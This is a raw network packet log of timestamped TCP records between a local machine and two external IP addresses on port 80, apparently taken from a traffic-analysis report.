                                                                                                                  Nov 30, 2024 01:55:22.582109928 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.582184076 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.582225084 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.583192110 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.583242893 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.583322048 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.583365917 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.584353924 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.584403038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.584475040 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.584520102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.585498095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.585546970 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.585628986 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.585674047 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.586674929 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.586726904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.586790085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.586836100 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.587822914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.587869883 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.587929964 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.587973118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.588970900 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.589020967 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.589092970 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.589135885 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.590116024 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.590162039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.590250015 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.590293884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.591294050 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.591346025 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.591379881 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.591419935 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.592420101 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.592470884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.592510939 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.592554092 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.593559980 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.593604088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.593661070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.593696117 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.594707012 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.594753027 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.594818115 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.594866037 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.595843077 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.595894098 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.595976114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.596036911 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.596997976 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.597049952 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.597100973 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.597146034 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.598154068 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.598201990 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.598273039 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.598320007 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.599303007 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.599354982 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.599452019 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.599495888 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.600382090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.600430965 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.714238882 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.714303970 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.714394093 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.714406013 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.714443922 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.714863062 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.714874029 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.714884996 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.714916945 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.714941978 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.715626955 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.715637922 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.715646982 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.715672970 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.715701103 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.716288090 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.716449976 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.741297960 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.741379976 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.741456032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.741513014 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.741780043 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.741832972 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.741926908 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.741976023 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.742961884 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.743057013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.743100882 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.744052887 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.744182110 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.744236946 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.745198965 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.745296955 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.745343924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.746337891 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.746398926 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.746437073 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.747466087 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.747513056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.747595072 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.748619080 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.748621941 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.748766899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.748811960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.749804020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.749917030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.749958038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.750935078 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.751018047 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.751051903 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.751121044 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.752089024 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.752202988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.752242088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.753213882 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.753328085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.753371954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.754405975 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.754458904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.754494905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.754534960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.755536079 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.755608082 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.755639076 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.755712032 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.756665945 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.756711006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.756777048 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.756815910 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.757850885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.757899046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.757936001 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.757986069 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.759001970 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.759069920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.759099960 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.759144068 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.760132074 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.760194063 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.760235071 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.760294914 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.761260033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.761312008 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.761420965 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.761499882 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.762418985 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.762485027 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.762541056 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.762588024 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.763585091 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.763638973 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.763701916 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.763747931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.764734983 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.764782906 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.764827013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.764872074 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.765873909 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.765918970 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.765959024 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.766062975 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.767046928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.767107964 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.767340899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.767977953 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.768184900 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.768234015 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.768400908 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.768455982 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.769324064 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.769370079 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.769423962 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.769610882 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.770488024 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.770548105 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.770616055 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.770657063 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.771662951 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.771719933 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.771748066 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.771893024 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.772797108 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.772844076 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.772900105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.772934914 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.773916006 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.774035931 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.774060965 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.774076939 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.775063992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.775111914 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.775168896 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.775209904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.776205063 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.776251078 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.776316881 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.776422024 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.777364969 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.777420998 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.777507067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.777569056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.778503895 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.778558016 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.778626919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.778671980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.779656887 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.779767990 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.779804945 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.779822111 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.780821085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.780884027 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.780919075 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.781032085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.781971931 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.782063007 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.782100916 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.782146931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.783135891 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.783181906 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.783272028 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.783318043 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.784370899 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.784440041 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.784480095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.784519911 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.785413027 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.785456896 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.785538912 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.785578966 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.786631107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.786684990 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.786752939 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.786823034 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.787729025 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.787861109 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.787903070 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.788856030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.788909912 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.788964033 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.789004087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.790011883 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.790064096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.790117979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.790153980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.791182041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.791224003 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.791321039 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.791392088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.792363882 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.792409897 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.792414904 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.792469025 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.793454885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.793499947 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.793618917 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.793673992 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.794590950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.794641018 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.794707060 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.794753075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.795741081 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.795792103 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.795864105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.795944929 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.796892881 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.797030926 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.797070980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.798043966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.798129082 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.798166990 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.798211098 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.799185038 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.799237013 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.799324989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.799366951 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.800339937 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.800390959 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.800451040 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.800498009 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.801438093 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.801487923 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:22.834219933 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.834270954 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.834367037 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.834412098 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.912512064 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.912636995 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.912653923 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.912888050 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.916726112 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.916857004 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.916898012 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.925144911 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.925260067 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.925308943 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.933536053 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.933660030 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.933701992 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.941994905 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.942085981 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.942145109 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.950360060 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.950404882 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.950473070 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.950515032 CET4974380192.168.2.4185.215.113.66
                                                                                                                  Nov 30, 2024 01:55:22.958734989 CET8049743185.215.113.66192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:22.958803892 CET4974380192.168.2.4185.215.113.66
